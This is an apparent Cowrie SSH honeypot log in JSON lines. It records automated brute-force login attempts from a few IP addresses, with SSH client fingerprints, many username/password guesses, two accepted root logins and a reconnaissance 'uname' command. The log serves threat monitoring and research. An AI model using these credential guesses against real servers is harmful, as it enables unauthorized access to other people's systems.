{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:11.066345Z","src_ip":"212.227.125.160","session":"aa179f6af95d"}
{"eventid":"cowrie.login.failed","username":"server","password":"123456","message":"login attempt [server/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:11.561850Z","src_ip":"212.227.125.160","session":"aa179f6af95d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:11.877313Z","src_ip":"83.168.105.65","session":"af45aa54cd19"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:12.613216Z","src_ip":"212.227.125.160","session":"aa179f6af95d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49084,"dst_ip":"1.2.3.4","dst_port":22,"session":"315b2d1326a8","protocol":"ssh","message":"New connection: 212.227.125.160:49084 (1.2.3.4:22) [session: 315b2d1326a8]","sensor":"my-vps","timestamp":"2025-08-26T11:43:16.689914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:16.705040Z","src_ip":"212.227.125.160","session":"315b2d1326a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:16.759375Z","src_ip":"212.227.125.160","session":"315b2d1326a8"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:17.057363Z","src_ip":"212.227.125.160","session":"315b2d1326a8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:18.157439Z","src_ip":"212.227.125.160","session":"315b2d1326a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49852,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4f4c23d98a0","protocol":"ssh","message":"New connection: 212.227.125.160:49852 (1.2.3.4:22) [session: f4f4c23d98a0]","sensor":"my-vps","timestamp":"2025-08-26T11:43:22.647021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:22.647909Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:22.709372Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:43:22.977678Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:43:23.171735Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:43:23.172530Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:23.226870Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:23.228000Z","src_ip":"212.227.125.160","session":"f4f4c23d98a0"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51918,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ad7dd949057","protocol":"ssh","message":"New connection: 83.168.105.65:51918 (1.2.3.4:22) [session: 1ad7dd949057]","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.190630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.191778Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.228901Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.343141Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:43:26.487987Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.488895Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.531035Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:26.532579Z","src_ip":"83.168.105.65","session":"1ad7dd949057"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50622,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b9f9685631b","protocol":"ssh","message":"New connection: 212.227.125.160:50622 (1.2.3.4:22) [session: 7b9f9685631b]","sensor":"my-vps","timestamp":"2025-08-26T11:43:28.731380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:28.732204Z","src_ip":"212.227.125.160","session":"7b9f9685631b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:28.781768Z","src_ip":"212.227.125.160","session":"7b9f9685631b"}
{"eventid":"cowrie.login.failed","username":"ball","password":"ball","message":"login attempt [ball/ball] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:29.001606Z","src_ip":"212.227.125.160","session":"7b9f9685631b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:30.057723Z","src_ip":"212.227.125.160","session":"7b9f9685631b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51392,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5a30f81bf8b","protocol":"ssh","message":"New connection: 212.227.125.160:51392 (1.2.3.4:22) [session: e5a30f81bf8b]","sensor":"my-vps","timestamp":"2025-08-26T11:43:34.136659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:34.137569Z","src_ip":"212.227.125.160","session":"e5a30f81bf8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:34.190485Z","src_ip":"212.227.125.160","session":"e5a30f81bf8b"}
{"eventid":"cowrie.login.failed","username":"myuser","password":"myuser","message":"login attempt [myuser/myuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:34.348201Z","src_ip":"212.227.125.160","session":"e5a30f81bf8b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:35.400299Z","src_ip":"212.227.125.160","session":"e5a30f81bf8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52160,"dst_ip":"1.2.3.4","dst_port":22,"session":"11a7e0b6f3df","protocol":"ssh","message":"New connection: 212.227.125.160:52160 (1.2.3.4:22) [session: 11a7e0b6f3df]","sensor":"my-vps","timestamp":"2025-08-26T11:43:39.773608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:39.775713Z","src_ip":"212.227.125.160","session":"11a7e0b6f3df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:39.826376Z","src_ip":"212.227.125.160","session":"11a7e0b6f3df"}
{"eventid":"cowrie.login.failed","username":"joakima","password":"joakima","message":"login attempt [joakima/joakima] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:40.051853Z","src_ip":"212.227.125.160","session":"11a7e0b6f3df"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:41.235430Z","src_ip":"212.227.125.160","session":"11a7e0b6f3df"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35834,"dst_ip":"1.2.3.4","dst_port":22,"session":"99e917524104","protocol":"ssh","message":"New connection: 83.168.105.65:35834 (1.2.3.4:22) [session: 99e917524104]","sensor":"my-vps","timestamp":"2025-08-26T11:43:41.710344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:41.711200Z","src_ip":"83.168.105.65","session":"99e917524104"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:41.747392Z","src_ip":"83.168.105.65","session":"99e917524104"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:41.857389Z","src_ip":"83.168.105.65","session":"99e917524104"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:42.895859Z","src_ip":"83.168.105.65","session":"99e917524104"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52932,"dst_ip":"1.2.3.4","dst_port":22,"session":"5180ad1c3494","protocol":"ssh","message":"New connection: 212.227.125.160:52932 (1.2.3.4:22) [session: 5180ad1c3494]","sensor":"my-vps","timestamp":"2025-08-26T11:43:45.652511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:45.693200Z","src_ip":"212.227.125.160","session":"5180ad1c3494"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:45.733012Z","src_ip":"212.227.125.160","session":"5180ad1c3494"}
{"eventid":"cowrie.login.failed","username":"testuser1","password":"testuser1","message":"login attempt [testuser1/testuser1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:45.908642Z","src_ip":"212.227.125.160","session":"5180ad1c3494"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:46.965108Z","src_ip":"212.227.125.160","session":"5180ad1c3494"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":47482,"dst_ip":"1.2.3.4","dst_port":22,"session":"f92c077392e1","protocol":"ssh","message":"New connection: 93.123.109.189:47482 (1.2.3.4:22) [session: f92c077392e1]","sensor":"my-vps","timestamp":"2025-08-26T11:43:49.237563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:49.238818Z","src_ip":"93.123.109.189","session":"f92c077392e1"}
